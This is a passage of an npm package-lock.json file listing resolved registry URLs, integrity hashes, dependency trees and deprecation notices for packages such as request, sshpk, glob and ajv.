"^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": 
"sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", 
"resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { 
"version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": 
"sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": 
"sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", 
"integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", 
"resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { 
"version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", 
"dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": 
"sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, 
